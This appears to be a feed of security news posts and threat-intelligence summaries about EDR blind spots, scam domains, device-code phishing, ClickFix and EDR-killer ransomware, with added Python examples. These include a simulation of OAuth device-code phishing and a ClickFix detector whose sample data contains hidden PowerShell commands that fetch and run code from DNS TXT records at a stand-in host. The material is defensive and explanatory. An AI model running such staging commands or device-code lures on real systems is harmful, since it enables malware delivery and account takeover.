🚨 NEWS: 12.7% of devices are invisible to autonomous security agents, according to the Axonius report

Here are the key points in brief:
💡 An endpoint agent cannot report its own absence. The Axonius Actionability 2026 report, produced with the Ponemon Institute from a survey of 662 IT and security professionals, has ...

🚀 LINK: https://meteoraweb.com/news/il-127-dei-dispositivi-e-invisibile-agli-agenti-di-sicurezza-autonomi-secondo-il-rapporto-axonius?utm_source=mastodon&utm_medium=social&utm_campaign=auto_share

#aiAct #eDR #agentiDiSicurezzaAutonomi #coperturaEndpoint #axonius
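The point that an agent cannot report its own absence means coverage has to be measured from outside the agent: reconcile several independent inventories and see which live devices the agent console has never heard of. The following is an added example of that reconciliation; it is not code from Axonius, Ponemon or any product, and the four inventories (DHCP, EDR console, MDM, AD) are constructed sample data with invented hostnames and a "days since last seen" value per device.

```python
"""Coverage-gap check across independent inventories.

Added example for the point above (an agent cannot report its own absence);
it is not code from Axonius, Ponemon or any product. The four inventories are
constructed sample data: hostnames are invented and the numbers are the
"days since last seen" each source reports for a device.
"""


def norm_host(name: str) -> str:
    """Short, lower-case hostname so 'WS-042' and 'ws-042.corp.example' match."""
    return name.strip().lower().split(".")[0]


# Constructed sample inventories: {hostname: days_since_last_seen}.
SOURCES = {
    "dhcp": {"ws-042.corp.example": 0, "ws-043": 1, "lab-pi-07": 2, "vendor-kiosk": 0},
    "edr":  {"WS-042": 0, "ws-043": 0, "srv-db-01": 0},          # what the agent console knows
    "mdm":  {"ws-042": 1, "lab-pi-07": 3},
    "ad":   {"WS-042": 0, "WS-043": 0, "SRV-DB-01": 0, "SRV-OLD-09": 120},
}


def reconcile(sources, agent_source="edr", max_age_days=30):
    """Merge every source by hostname and list devices the agent source never saw.

    Records older than max_age_days are dropped so that stale directory objects
    (decommissioned hosts still sitting in AD) do not inflate the gap.
    """
    seen = {}
    for src, hosts in sources.items():
        for host, age in hosts.items():
            if age > max_age_days:
                continue
            seen.setdefault(norm_host(host), set()).add(src)
    missing = sorted(h for h, srcs in seen.items() if agent_source not in srcs)
    agent_only = sum(1 for srcs in seen.values() if agent_source in srcs)
    return {
        "assets": len(seen),
        "agent_console_count": agent_only,   # the number the EDR dashboard would show
        "missing_agent": missing,
        "gap_pct": round(100.0 * len(missing) / len(seen), 1) if seen else 0.0,
        "sources_for_missing": {h: sorted(seen[h]) for h in missing},
    }


if __name__ == "__main__":
    report = reconcile(SOURCES)
    print(f"{report['assets']} live assets, EDR console sees {report['agent_console_count']}")
    print(f"{report['gap_pct']}% without an agent: {report['missing_agent']}")
    for host, srcs in report["sources_for_missing"].items():
        print(f"  {host}: known only to {', '.join(srcs)}")
```

On the sample data the EDR console reports three devices, all healthy, while the merged view finds five live assets and a 40% gap; the staleness cut-off is what keeps the long-dead AD object from being counted as a sixth. In practice the join key should be something more stable than a hostname (MAC, serial, or a device certificate), and the threshold should follow each source's own refresh cadence.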

From San Pedro to Salinas: How a Chinese Framework “DCloud Uni-App” Powers a Global Scam Economy

A Chinese web-development framework called DCloud Uni-App has become the technical foundation for over 236,000 scam domains since 2022, powering fake cryptocurrency exchanges, pig-butchering operations, wallet drainers, gambling platforms, and brand-impersonation sites. The framework gained prominence after the 2024 RainbowEx cryptocurrency scam in Argentina, which defrauded residents of San Pedro. Similar operations include the Lightning Shared Scooter Co. (LSSC) scam in the United States, which caused millions in losses across multiple states, and the currently active Yuechi Sharing Technology Ltd. bicycle-sharing investment scam. These operations use legitimate hosting providers, with approximately 6% utilizing bulletproof hosting, particularly CTG Server. The scams target victims globally through WhatsApp, Telegram, and social media, converting victims into recruiters for pyramid-style operations. Enterprise exposure reaches over 985 distinct organizations across 25 industry verticals, with over five m...

Pulse ID: 6a3d76e5578987f6ddf8979f
Pulse Link: https://otx.alienvault.com/pulse/6a3d76e5578987f6ddf8979f
Pulse Author: AlienVault
Created: 2026-06-25 18:43:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Chinese #Cloud #CyberSecurity #EDR #InfoSec #OTX #OpenThreatExchange #RAT #SocialMedia #Telegram #UnitedStates #WhatsApp #bot #cryptocurrency #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Oops… A macOS XPC flaw can disable EDR and MDM protections — even trusted endpoint controls can be bypassed 🍎⚠️ #MacSecurity #EDR

https://www.infosecurity-magazine.com/news/macos-xpc-flaw-disable-edr-mdm/

macOS Flaw Lets Standard Users Disable EDR and MDM


Infosecurity Magazine

macOS Flaw Enables Users to Disable EDR, MDM Tools

A security flaw in macOS has been discovered that allows users to quietly disable crucial enterprise security tools, including EDR and MDM, without needing administrator privileges. This gap in endpoint security models could leave businesses vulnerable to attacks.

https://osintsights.com/macos-flaw-enables-users-to-disable-edr-mdm-tools?utm_source=mastodon&utm_medium=social

#Macos #EndpointSecurity #Edr #Mdm #PrivilegeEscalation


Learn how a macOS flaw lets users disable EDR and MDM tools and protect your organization - discover the vulnerability and take action now to secure your systems.

OSINTSights

"Ghost" Code Phishing Analysis

EvilTokens is a sophisticated phishing kit that conceals critical components of its attack through browser-side AES-GCM encryption, creating visibility gaps for traditional static URL analysis. The kit exploits Microsoft's legitimate device login flow through OAuth device-code phishing to gain account access without directly stealing passwords. Targeting organizations primarily in the United States and Europe, EvilTokens focuses on managed security services, technology, manufacturing, education, banking, and consulting sectors. The encrypted landing page only reveals its malicious content after browser decryption, requiring dynamic analysis to uncover the complete attack chain. The kit uses multiple stages including gate checks, user code requests, and session monitoring to complete Microsoft 365 account takeovers while appearing legitimate through final redirects to OneDrive.

Pulse ID: 6a3b02a43a7a626b53174466
Pulse Link: https://otx.alienvault.com/pulse/6a3b02a43a7a626b53174466
Pulse Author: AlienVault
Created: 2026-06-23 22:03:16

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Bank #Browser #CyberSecurity #EDR #Education #Encryption #Europe #InfoSec #Manufacturing #Microsoft #OTX #OpenThreatExchange #Password #Passwords #Phishing #UnitedStates #Word #bot #AlienVault
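Device-code phishing works because the OAuth device authorization grant (RFC 8628) deliberately separates the party that polls for tokens from the party that authenticates: the kit only has to get the victim to type a short code into the genuine sign-in page. The following added example plays both sides of that exchange against a minimal in-memory identity provider. It is not EvilTokens code and the server is a stand-in for the real IdP, not Microsoft's endpoints; the client ID, scopes, codes and tokens are all invented.

```python
"""Simulated OAuth 2.0 device authorization grant (RFC 8628) as abused by
device-code phishing.

Added example for the EvilTokens summary above; it is not the kit's code and the
in-memory AuthorizationServer is a stand-in for the real identity provider, not
Microsoft's endpoints. Client IDs, scopes, codes and tokens are all invented.
"""
import secrets
import string
import time

ALPHABET = string.ascii_uppercase + string.digits


class AuthorizationServer:
    """Minimal IdP: device-authorization endpoint, user approval, token endpoint."""

    def __init__(self, lifetime_s=900):
        self.pending = {}          # device_code -> grant state
        self.lifetime_s = lifetime_s

    def device_authorization(self, client_id, scope):
        device_code = secrets.token_urlsafe(32)     # secret, only the polling client holds it
        user_code = "-".join("".join(secrets.choice(ALPHABET) for _ in range(4)) for _ in range(2))
        self.pending[device_code] = {
            "client_id": client_id, "scope": scope, "user_code": user_code,
            "approved_by": None, "expires": time.time() + self.lifetime_s,
        }
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://idp.example/devicelogin", "interval": 5}

    def user_approves(self, user_code, username):
        """The user signs in on the genuine IdP page and types the short code.
        Whoever presented that code to the user receives the resulting grant."""
        for grant in self.pending.values():
            if grant["user_code"] == user_code and grant["approved_by"] is None:
                grant["approved_by"] = username
                return True
        return False

    def token(self, client_id, device_code):
        grant = self.pending.get(device_code)
        if grant is None or grant["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if time.time() > grant["expires"]:
            del self.pending[device_code]
            return {"error": "expired_token"}
        if grant["approved_by"] is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]               # a device code is single use
        return {"token_type": "Bearer", "scope": grant["scope"], "sub": grant["approved_by"],
                "access_token": secrets.token_urlsafe(32),
                "refresh_token": secrets.token_urlsafe(32)}


def device_code_phish(idp, victim="alice@example.com", client_id="public-desktop-client"):
    """Both sides of the exchange: the attacker's client and the lured victim."""
    # 1. Attacker starts the flow under a public client ID with a scope that yields a refresh token.
    start = idp.device_authorization(client_id, "offline_access Mail.Read Files.Read")
    # 2. Attacker polls the token endpoint while the lure is out; the IdP answers "pending".
    first_poll = idp.token(client_id, start["device_code"])
    # 3. The phishing page shows the victim only the user_code and the real verification URL.
    #    The victim authenticates on the genuine IdP (password, MFA and all); no credential
    #    ever passes through the kit.
    idp.user_approves(start["user_code"], victim)
    # 4. The next poll returns tokens issued in the victim's name to the attacker's client.
    tokens = idp.token(client_id, start["device_code"])
    replay = idp.token(client_id, start["device_code"])   # grant already consumed
    return {"user_code": start["user_code"], "first_poll": first_poll,
            "tokens": tokens, "replay": replay}


if __name__ == "__main__":
    run = device_code_phish(AuthorizationServer())
    print("victim was shown code:", run["user_code"])
    print("poll before approval:", run["first_poll"])
    print("poll after approval: sub=%s scope=%s" % (run["tokens"]["sub"], run["tokens"]["scope"]))
```

Nothing in the exchange is broken from the IdP's point of view, which is why URL reputation and password-theft detection both miss it. What the defender can see is the sign-in recorded in the victim's name under the device-code protocol from a client and location the user never uses; where the identity provider allows it, block the device code flow for the users and clients that have no need for it, and treat `offline_access` grants obtained this way as a refresh token that must be revoked, not just a session to sign out.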


PHISH ALERT: From a Simple Phishing Email to a Full Attack Arsenal: The Evolution of "ClickFix"

A sophisticated phishing campaign leverages evolved ClickFix techniques to bypass modern endpoint security through victim-assisted execution. Targets receive emails with urgent OneDrive document lures containing malicious ZIP attachments. The attack uses LNK shortcuts that redirect victims to landing pages, silently injecting PowerShell commands into their clipboard. Through social engineering, victims are tricked into manually executing commands via Win+R, circumventing traditional security filters. The campaign employs DNS TXT records for payload staging, avoiding HTTP detection. The threat infrastructure hosts multiple malicious components including obfuscated scripts, fake MSI installers masquerading as legitimate software like ConnectWise, and ISO images with spyware for persistent access. This represents a shift toward long-game tactics focused on establishing full post-compromise environmental control.

Pulse ID: 6a3a7809c43cfba36348ed9d
Pulse Link: https://otx.alienvault.com/pulse/6a3a7809c43cfba36348ed9d
Pulse Author: AlienVault
Created: 2026-06-23 12:11:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Clipboard #ConnectWise #CyberSecurity #DNS #EDR #Email #Endpoint #HTTP #ICS #InfoSec #LNK #OTX #OpenThreatExchange #Phishing #PowerShell #SocialEngineering #SpyWare #ZIP #bot #AlienVault
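Two of the behaviours described above leave distinctive traces on the endpoint: anything typed into Win+R runs with explorer.exe as its parent (and is recorded under the user's RunMRU registry key), and payload staging through DNS TXT records shows up as a TXT lookup inside the interpreter's command line. The following added detection scores process-creation records and RunMRU values on those traces; it is not code from the report's authors and is not tied to any EDR product. The log records and registry values are constructed, and the domains and paths in them are invented.

```python
"""Flag Run-dialog (Win+R) launched interpreters that stage payloads from DNS TXT
records, over constructed process-creation records and RunMRU values.

Added example for the ClickFix summary above; not code from the report's authors
and not tied to any specific EDR product. The log records and registry values
below are constructed; the domains and paths in them are invented.
"""
import re

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")

# Each rule: (label, weight, regex applied to the lower-cased command line).
CMDLINE_RULES = [
    ("dns_txt_lookup", 3, re.compile(
        r"resolve-dnsname[^|;]*-type\s+txt|nslookup[^|;]*-(type|q|querytype)=txt")),
    ("hidden_or_bypass", 2, re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-exec(utionpolicy)?\s+bypass|-enc(odedcommand)?\b")),
    ("download_cradle", 1, re.compile(
        r"\biex\b|invoke-expression|\.strings\b|downloadstring|invoke-webrequest|\bcurl\b")),
]
ALERT_THRESHOLD = 5


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process(image, parent_image, cmdline):
    """Return (score, reasons) for one process: Run-dialog parentage plus command-line rules."""
    text = cmdline.lower()
    score, reasons = 0, []
    if basename(parent_image) == "explorer.exe" and basename(image) in INTERPRETERS:
        score += 2
        reasons.append("interpreter_from_run_dialog")
    for label, weight, rx in CMDLINE_RULES:
        if rx.search(text):
            score += weight
            reasons.append(label)
    return score, reasons


def hunt_process_events(events):
    """events: Sysmon-style dicts with Image / ParentImage / CommandLine. Returns alerts."""
    alerts = []
    for ev in events:
        score, reasons = score_process(ev["Image"], ev["ParentImage"], ev["CommandLine"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"id": ev["id"], "score": score, "reasons": reasons})
    return alerts


def hunt_runmru(values):
    """RunMRU (HKCU\\...\\Explorer\\RunMRU) keeps what a user typed into Win+R, each value
    ending in '\\1'. Anything typed there ran with explorer.exe as parent, so it is
    scored exactly like a process event with that parent."""
    alerts = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        parts = cmd.split()
        exe = parts[0] if parts else ""
        image = exe if exe.lower().endswith(".exe") else exe + ".exe"
        score, reasons = score_process(image, "explorer.exe", cmd)
        if score >= ALERT_THRESHOLD:
            alerts.append({"value": name, "command": cmd, "score": score, "reasons": reasons})
    return alerts


# Constructed sample records (invented hosts, domains and paths).
PROCESS_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (Resolve-DnsName -Type TXT s1.lure.example).Strings"'},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\svchost.exe",      # scheduled admin script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Resolve-DnsName -Type TXT example.com | Select-Object Strings"'},
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c nslookup -type=txt beacon.lure.example 2>nul"},
    {"id": 5, "ParentImage": r"C:\Windows\explorer.exe",              # plain interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell"},
]
RUNMRU = {
    "MRUList": "ba",
    "a": 'powershell -w hidden -c "iex (Resolve-DnsName -Type TXT s1.lure.example).Strings"\\1',
    "b": "notepad\\1",
}

if __name__ == "__main__":
    for a in hunt_process_events(PROCESS_EVENTS):
        print("process event", a["id"], "score", a["score"], a["reasons"])
    for a in hunt_runmru(RUNMRU):
        print("RunMRU value", a["value"], "score", a["score"], "->", a["command"])
```

The weights are deliberately conservative: a TXT lookup from a scheduled task (event 3) or a bare shell opened from the Run dialog (event 5) each score below the threshold on their own, and only the combination of Run-dialog parentage with DNS staging or a hidden-window cradle fires. The RunMRU pass is the forensic counterpart for hosts where process logging was not on at the time.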


📰 New 'Gentlemen' Ransomware Uses EDR Killer Framework to Blindside Security Tools

New 'The Gentlemen' ransomware is aggressively disabling security tools. ⚔️ It uses a multi-pronged 'GentleKiller' framework to terminate EDR/AV products before encryption. Ensure your tamper protection is on! #Ransomware #CyberSecurity #EDR

🌐 cyber[.]netsecops[.]io

🔗 https://cyber.netsecops.io/articles/gentlemen-ransomware-deploys-edr-killers-to-evade-defenses/?utm_source=mastodon&ut…

New blog post!

I recently completed the OffSec Expert Penetration Tester (OSEP) certificate.

Here are my thoughts on it:

https://ti-kallisti.com/certs/osep.html

#InfoSec #RedTeam #RedTeaming #EDR #Offsec #Metasploit

An EDR killer found in a ransomware group's arsenal: the tool doesn't just evade detection, it actively switches it off. What's notable is that these tools now circulate between groups, like reusable components. The attack surface isn't growing, it's becoming structured. #infosec #ransomware #EDR
https://www.lemondeinformatique.fr/actualites/lire-un-tueur-d-edr-retrouve-dans-l-arsenal-d-un-groupe-de-ransomware-100518.html
An EDR killer found in a ransomware group's arsenal - Le Monde Informatique

The Gentlemen gang offered its affiliates a sophisticated tool for disabling threat detection and response solutions on...

LeMondeInformatique

The Gentlemen RaaS Uses GentleKiller Framework for EDR Evasion and Ransomware Deployment

Pulse ID: 6a37f30eaaf37bbb5daa581f
Pulse Link: https://otx.alienvault.com/pulse/6a37f30eaaf37bbb5daa581f
Pulse Author: cryptocti
Created: 2026-06-21 14:19:58

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EDR #InfoSec #OTX #OpenThreatExchange #RaaS #RansomWare #bot #cryptocti
